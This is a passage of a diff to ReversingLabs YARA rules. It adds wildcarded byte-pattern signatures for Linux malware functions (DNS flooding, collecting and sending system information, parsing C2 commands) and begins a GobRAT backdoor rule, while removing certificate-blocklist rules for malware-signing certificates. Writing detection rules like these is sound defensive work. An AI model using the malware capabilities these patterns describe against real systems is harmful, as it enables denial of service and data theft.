+            ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ??
+            ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB
+            8D B4 24 ?? ?? ?? ?? B0 ?? 8D BC 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? B1 ?? F3 A5 89
+            D6 8B BC 24 ?? ?? ?? ?? F7 C7 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F7 C7 ?? ?? ?? ?? 0F 85
+            ?? ?? ?? ?? 89 C1 C1 E9 ?? A8 ?? F3 A5 0F 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? 89
+            54 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
+            81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C3
+        }
+		$dns_flood_32_p1 = {
+            55 57 56 53 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 5C 24 ?? 8B
+            B4 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? F6 C3 ?? 89 DF 0F 85 ?? ?? ?? ?? 89 C1 C1 E9 ?? A8
+            ?? F3 A5 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
+            89 F7 89 44 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 31 D2
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? F7 35 ?? ?? ??
+            ?? 8B 04 95 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 C5 8D
+            44 24 ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? F3 AB 8D 54 24 ??
+            89 14 24 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 5C 24 ?? 89 84 24 ??
+            ?? ?? ?? 0F B7 44 24 ?? 66 89 84 24 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 89 04 24 E8 ??
+            ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 14 24 89 74 24 ?? 89 54 24 ?? C6 84 24 ?? ?? ?? ??
+            ?? C6 84 24 ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ??
+            ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54
+        }
+		$dns_flood_32_p2 = {
+            24 ?? 89 D1 8B 39 83 C1 ?? 8D 87 ?? ?? ?? ?? F7 D7 21 F8 25 ?? ?? ?? ?? 74 ?? A9 ??
+            ?? ?? ?? 0F 84 ?? ?? ?? ?? 00 C0 89 D7 83 D9 ?? 29 D1 8D 84 0C ?? ?? ?? ?? 66 C7 00
+            ?? ?? 66 C7 40 ?? ?? ?? 8B 0F 83 C7 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ??
+            74 ?? A9 ?? ?? ?? ?? 75 ?? C1 E8 ?? 83 C7 ?? 00 C0 8D 44 24 ?? 83 DF ?? C7 44 24 ??
+            ?? ?? ?? ?? 29 D7 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 89 74
+            24 ?? 89 84 24 ?? ?? ?? ?? 0F B7 44 24 ?? 89 14 24 66 89 84 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 94 24 ?? ?? ?? ?? 89 5C 24 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ??
+            83 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 C7 ?? 89 C2
+            C1 FA ?? F7 F9 8D 42 ?? 66 C1 C8 ?? 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 31 D2 C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 2C 24 F7 35 ?? ?? ?? ??
+            8B 04 95 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D 44 24 ?? 89 44
+            24 ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 83 80 ?? ?? ?? ?? ?? 83 90 ?? ?? ?? ?? ??
+            83 3D ?? ?? ?? ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? E8
+        }
+		$collect_system_information_64_p1 = {
+            41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 4C 8D 84 24 ??
+            ?? ?? ?? 48 8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ??
+            ?? 0F 31 48 89 D3 48 8D 7C 24 ?? 31 F6 48 C1 E3 ?? 89 C0 48 01 C3 E8 ?? ?? ?? ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D5 48 8D 7C 24 ?? 31 F6 48 C1 E5 ?? 89 C0 45
+            31 E4 48 01 C5 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 2B 44 24 ?? 48 29 DD 48 8B 54 24 ??
+            2B 54 24 ?? BF ?? ?? ?? ?? F2 48 0F 2A C5 48 8D AC 24 ?? ?? ?? ?? 69 C0 ?? ?? ?? ??
+            01 D0 F2 0F 2A C8 F2 0F 5E C1 F2 0F 2C D8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 BE ??
+            ?? ?? ?? BF ?? ?? ?? ?? 31 C0 41 89 D8 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 05
+            ?? ?? ?? ?? BF ?? ?? ?? ?? 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? BE
+            ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E0 B9 ?? ?? ?? ?? 48 89 EF F3 48 AB
+        }
+		$collect_system_information_64_p2 = {
+            48 89 DF 48 89 DA 48 89 EE B1 ?? F3 48 AB BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24
+            ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E0 B9
+            ?? ?? ?? ?? 48 89 DF F3 48 AB 8B 44 24 ?? BE ?? ?? ?? ?? 48 89 DF 8D 90 ?? ?? ?? ??
+            85 C0 0F 49 D0 31 C0 C1 FA ?? 89 54 24 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? BE ??
+            ?? ?? ?? BF ?? ?? ?? ?? 41 89 C5 E8 ?? ?? ?? ?? 4C 89 E0 B9 ?? ?? ?? ?? 48 89 EF F3
+            48 AB 48 89 DF 48 89 DA 48 89 EE B1 ?? F3 48 AB BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 45 85
+            ED 75 ?? BA ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF
+            ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7C 24 ?? 31 C9
+            BA ?? ?? ?? ?? 31 F6 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D C3
+        }
+		$send_system_info_64 = {
+            55 53 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48
+            8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BE ??
+            ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D3 31 F6 48 89 E7 48 C1 E3 ?? 89
+            C0 48 01 C3 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D5 48 8D 7C 24
+            ?? 31 F6 89 C0 48 C1 E5 ?? 48 01 C5 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 2B 04 24 48 29
+            DD 48 8B 54 24 ?? 2B 54 24 ?? BF ?? ?? ?? ?? F2 48 0F 2A C5 69 C0 ?? ?? ?? ?? 01 D0
+            F2 0F 2A C8 F2 0F 5E C1 F2 0F 2C D8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 BE ?? ?? ??
+            ?? BF ?? ?? ?? ?? 31 C0 41 89 D8 E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? BA ?? ?? ?? ??
+            BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? BA ?? ?? ?? ??
+            BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5D C3
+        }
+		$parse_c2_commands_64 = {
+            41 57 31 C0 49 89 FF B9 ?? ?? ?? ?? 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48
+            8D 9C 24 ?? ?? ?? ?? 40 88 B4 24 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 8D A4 24 ??
+            ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 DF F3 48 AB C7 07 ?? ?? ?? ?? BF ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8D 43 ?? 48 89 84 24 ?? ?? ?? ?? 0F 1F 00 8B 3D ?? ?? ?? ?? 31 C9
+            BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 44 8B B4 24 ?? ??
+            ?? ?? 45 85 F6 0F 84 ?? ?? ?? ?? 31 C0 44 89 F6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 84
+            24 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ?? ??
+            ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ??
+            ?? ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 85
+            ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? F3 48 AB 48 8B 84 24 ?? ??
+            ?? ?? 4C 8B 9C 24 ?? ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? 4C 8B 8C 24 ?? ?? ?? ?? 4C 8B
+            84 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? C7 07 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
+            48 8B 84 24 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B 94 24
+            ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ??
+            48 8B AC 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 84 24
+            ?? ?? ?? ?? 4C 89 9C 24 ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? 4C 89 8C 24 ?? ?? ?? ??
+            4C 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 B4 24
+            ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ??
+            4C 89 A4 24 ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24
+            ?? ?? ?? ?? 49 89 57 ?? 48 8B 94 24 ?? ?? ?? ?? 49 89 77 ?? 48 8D B4 24
+        }
+		$dns_flood_64_p1 = {
+            41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 49 89
+            FC BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 89 D9 4C 89 E6 48 8D AC 24 ?? ?? ?? ?? F3 48 A5
+            8B 06 48 89 CB 89 07 0F B7 46 ?? 8B 35 ?? ?? ?? ?? 66 89 47 ?? BF ?? ?? ?? ?? 31 C0
+            E8 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 C7 04 24 ?? ??
+            66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 31 D2 BE ?? ?? ?? ?? BF ?? ?? ?? ?? F7 35 ?? ??
+            ?? ?? 89 D2 8B 04 95 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 48 89 E6 89 C7 41 89 C5 E8 ?? ?? ?? ?? 48 89 D8 B9 ?? ?? ?? ?? 48 89 EF F3 48
+            AB 48 8D 7C 24 ?? BE ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ??
+            48 8D 7D ?? 48 8D 74 24 ?? 89 84 24 ?? ?? ?? ?? 0F B7 44 24 ?? 66 89 84 24 ?? ?? 00
+            00 E8 ?? ?? ?? ?? 48 89 EE 48 89 DF C6 84 24 ?? ?? ?? ?? ?? C6 84 24
+        }
+		$dns_flood_64_p2 = {
+            66 C7 84 24 ?? ?? 00 00 ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? 66 C7 84 24 ?? ?? 00 00
+            ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? E8 ?? ?? ?? ?? 48 89 D9 8B 01 48 83 C1 ?? 8D 90
+            ?? ?? ?? ?? F7 D0 21 C2 81 E2 ?? ?? ?? ?? 74 ?? 89 D0 C1 E8 ?? F7 C2 ?? ?? ?? ?? 0F
+            44 D0 48 8D 41 ?? 48 0F 44 C8 00 D2 48 83 D9 ?? 48 29 D9 48 8D 84 0C ?? ?? ?? ?? 48
+            8D 8C 24 ?? ?? ?? ?? 66 C7 00 ?? ?? 66 C7 40 ?? ?? ?? 48 89 CB 8B 13 48 83 C3 ?? 8D
+            82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ?? 74 ?? 89 C2 48 8D 7C 24 ?? BE ?? ?? ?? ??
+            C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48 8D 53 ?? 48 0F 44 DA 00 C0 48 83 DB ?? 48 29 CB
+            E8 ?? ?? ?? ?? 8B 44 24 ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 EE 89 84 24 ?? ?? ?? ?? 0F
+            B7 44 24 ?? 66 89 84 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48 8D 7D ?? 48 8D 74 24 ?? E8 ??
+            ?? ?? ?? 41 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 B9 ?? ??
+            ?? ?? 83 C3 ?? C1 FA ?? F7 F9 8D 42 ?? 66 C1 C8 ?? 66 89 84 24 ?? ?? 00 00 E8 ?? ??
+            ?? ?? 31 D2 48 8D B4 24 ?? ?? ?? ?? 31 C9 F7 35 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89
+            E0 44 89 EF 89 D2 8B 04 95 ?? ?? ?? ?? 48 63 D3 89 44 24 ?? E8 ?? ?? ?? ?? 49 83 84
+            24 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 74 ?? BF ?? ?? ?? ?? E8
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Instamix Limited" and ( pe.signatures [ i ] . serial == "00:a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5" or pe.signatures [ i ] . serial == "a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5" ) and 1598054400 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( ( ( all of ( $collect_system_information_32_p* ) ) and ( $send_system_info_32 ) and ( $parse_c2_commands_32 ) and ( all of ( $dns_flood_32_p* ) ) ) or ( ( all of ( $collect_system_information_64_p* ) ) and ( $send_system_info_64 ) and ( $parse_c2_commands_64 ) and ( all of ( $dns_flood_64_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0Fa13Ae98E17Ae23Fcfe7Ae873D0C120 : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Gobrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GobRAT backdoor."
 		author = "ReversingLabs"
-		id = "87a47456-4d90-5a7d-af9d-7a6d5fb8efac"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "390bd83e-ac43-511a-b07b-3dc3d9890353"
+		date = "2025-03-27"
+		modified = "2025-03-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5310-L5326"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.GobRAT.yara#L1-L168"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "415f39f82b6a45acd196ccf246ec660806a8d66c61df8c7d2850e5b244118d04"
+		logic_hash = "ce29568231a4103663f4b478de3210e00e14b14eda7781f05ecf0cf576fc5ad2"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "GobRAT"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KLAKSON, LLC" and pe.signatures [ i ] . serial == "0f:a1:3a:e9:8e:17:ae:23:fc:fe:7a:e8:73:d0:c1:20" and 1597276801 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_3696883055975D571199C6B5D48F3Cd5 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "f68338f9-8614-5793-981d-70547dbc65ce"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5328-L5344"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d6f77b9ca928167341a35b83e353886d4db8dfcecf45cde0f0f93d65059b5200"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$get_local_address_p1 = {
+            49 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 83 C4 ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 83 3D ??
+            ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? 48 85 FF 75 ?? 48 85 DB 74 ?? 48 89 5C 24 ?? 31 C9
+            EB ?? 48 8B 05 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 35 ?? ??
+            ?? ?? 48 8B 0D ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 EC ?? C3 48 83
+            C0 ?? 48 89 D1 48 8B 50 ?? 4C 8D 0D ?? ?? ?? ?? 4C 39 08 74 ?? BA ?? ?? ?? ?? 48 89
+            4C 24 ?? 48 89 44 24 ?? 48 89 54 24 ?? 74 ?? 31 F6 EB ?? 48 8B 02 48 8B 5A ?? 48 8B
+            4A ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B
+            5C 24 ?? 4C 8D 0D ?? ?? ?? ?? 31 F6 EB ?? 48 8B 54 24 ?? 48 8B 02 48 8B 5A ?? 48 8B
+            4A ?? E8 ?? ?? ?? ?? 83 F0 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 4C 8D 0D
+            ?? ?? ?? ?? 89 C6 48 8B 44 24 ?? 40 84 F6 74 ?? 4C 8B 12 4C 8B 5A ?? 4C 8B 62 ?? 49
+            83 FB ?? 75 ?? 4C 89 D6 EB ?? 49 83 FB ?? 75 ?? 31 F6 E9 ?? ?? ?? ?? 48 8D 51 ?? 48
+            39 D3 0F 8F ?? ?? ?? ?? 0F 1F 40 ?? E9 ?? ?? ?? ?? 31 F6 48 85 F6 74 ?? 4C 89 D0 4C
+            89 DB 4C 89 E1 E8 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 3D ??
+            ?? ?? ?? 4C 8D 46 ?? 4C 39 C7 73 ?? 48 89 44 24 ?? 48 89 5C 24 ?? 48 8D 05 ?? ?? ??
+            ?? 48 89 D3 48 89 F1 4C 89 C6 E8 ?? ?? ?? ?? 48 89 0D ?? ?? ?? ?? 83 3D ?? ?? ?? ??
+            ?? 75 ?? 48 89 05 ?? ?? ?? ?? EB ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 48
+        }
+		$get_local_address_p2 = {
+            89 DE 48 8B 44 24 ?? 48 8B 5C 24 ?? 4C 8D 46 ?? 4C 89 05 ?? ?? ?? ?? 48 C1 E6 ?? 48
+            89 5C 32 ?? 48 8D 3C 32 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 04 32 EB ?? E8 ?? ?? ?? ??
+            48 8B 54 24 ?? 48 8B 02 48 8B 5A ?? 48 8B 4A ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B
+            35 ?? ?? ?? ?? 48 8D 56 ?? 48 8B 1D ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? 48 39 D7 73 ??
+            89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 F1 48 89 D6 E8 ?? ?? ?? ?? 48 89 0D ?? ?? ??
+            ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 05 ?? ?? ?? ?? EB ?? 48 8D 3D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 89 DE 48 89 C3 8B 44 24 ?? 48 8D 56 ?? 48 89 15 ?? ?? ?? ?? 89 04 B3 48
+            8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 5C 24 ?? 4C 8D 0D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 FF
+            C6 48 83 FE ?? 7D ?? 45 0F B6 2C 32 45 84 ED 74 ?? E9 ?? ?? ?? ?? 41 80 7A ?? ?? 0F
+            1F 44 00 ?? 0F 85 ?? ?? ?? ?? 41 80 7A ?? ?? 0F 85 ?? ?? ?? ?? 49 8D 72
+        }
+		$get_mac_address_p1 = {
+            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
+            ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 83 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? 48 85 FF
+            75 ?? 48 85 DB 74 ?? 48 89 5C 24 ?? 31 C9 EB ?? 31 C0 31 DB 48 8B AC 24 ?? ?? ?? ??
+            48 81 C4 ?? ?? ?? ?? C3 48 8B 05 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B AC 24 ?? ??
+            ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 83 C0 ?? 48 89 D1 0F 10 00 0F 11 84 24 ?? ?? ?? ??
+            0F 10 40 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 40 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 40 ??
+            0F 11 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 85 D2 75
+            ?? 31 D2 31 F6 EB ?? 48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 89 54 24 ?? 48 89 B4
+            24 ?? ?? ?? ?? 48 8D 0C 52 48 8D 49 ?? 48 89 4C 24 ?? 48 8D 05 ?? ?? ?? ?? 31 DB 0F
+            1F 44 00 ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B 7C 24 ?? 31
+            C9 31 DB EB ?? 48 89 D9 48 89 C3 31 C0 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 DA 48 89
+            C6 48 8B 84 24 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 85 D2 0F 85 ?? ?? ?? ?? 48 8D 51 ?? 48
+            39 D3 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 46 88 0C 10 48 FF C1 4C 89 C3 48 39 D1 7D ??
+            48 89 4C 24 ?? 44 0F B6 04 0E 44 88 44 24 ?? 0F 1F 44 00 ?? 48 85 C9 7E ?? 4C 8D 4B
+            ?? 4C 39 CF 73 ?? 48 89 5C 24 ?? 48 89 D9 4C 89 CE 48 89 C3 48 8D 05 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 4C 8D 4B ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 8B B4 24 ?? ?? ?? ?? 44 0F
+        }
+		$get_mac_address_p2 = {
+            B6 44 24 ?? 48 89 CF 48 8B 4C 24 ?? C6 04 18 ?? EB ?? 49 89 D9 4D 8D 51 ?? 45 89 C3
+            41 C0 E8 ?? 45 0F B6 C0 4C 8D 25 ?? ?? ?? ?? 47 0F B6 04 04 4C 39 D7 73 ?? 44 88 44
+            24 ?? 4C 89 4C 24 ?? 48 89 C3 4C 89 C9 4C 89 D6 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            4C 8D 53 ?? 48 8B 54 24 ?? 48 8B B4 24 ?? ?? ?? ?? 44 0F B6 44 24 ?? 4C 8B 4C 24 ??
+            44 0F B6 5C 24 ?? 4C 8D 25 ?? ?? ?? ?? 48 89 CF 48 8B 4C 24 ?? 46 88 04 08 4D 8D 42
+            ?? 41 83 E3 ?? 47 0F B6 0C 23 4C 39 C7 0F 83 ?? ?? ?? ?? 4C 89 54 24 ?? 44 88 4C 24
+            ?? 48 89 C3 4C 89 D1 4C 89 C6 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 43 ?? 48 8B
+            54 24 ?? 48 8B B4 24 ?? ?? ?? ?? 44 0F B6 4C 24 ?? 4C 8B 54 24 ?? 48 89 CF 48 8B 4C
+            24 ?? E9 ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 35 ?? ??
+            ?? ?? 66 90 E9 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 0F 1F 44 00
+        }
+		$network_communication_tcp_p1 = {
+            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
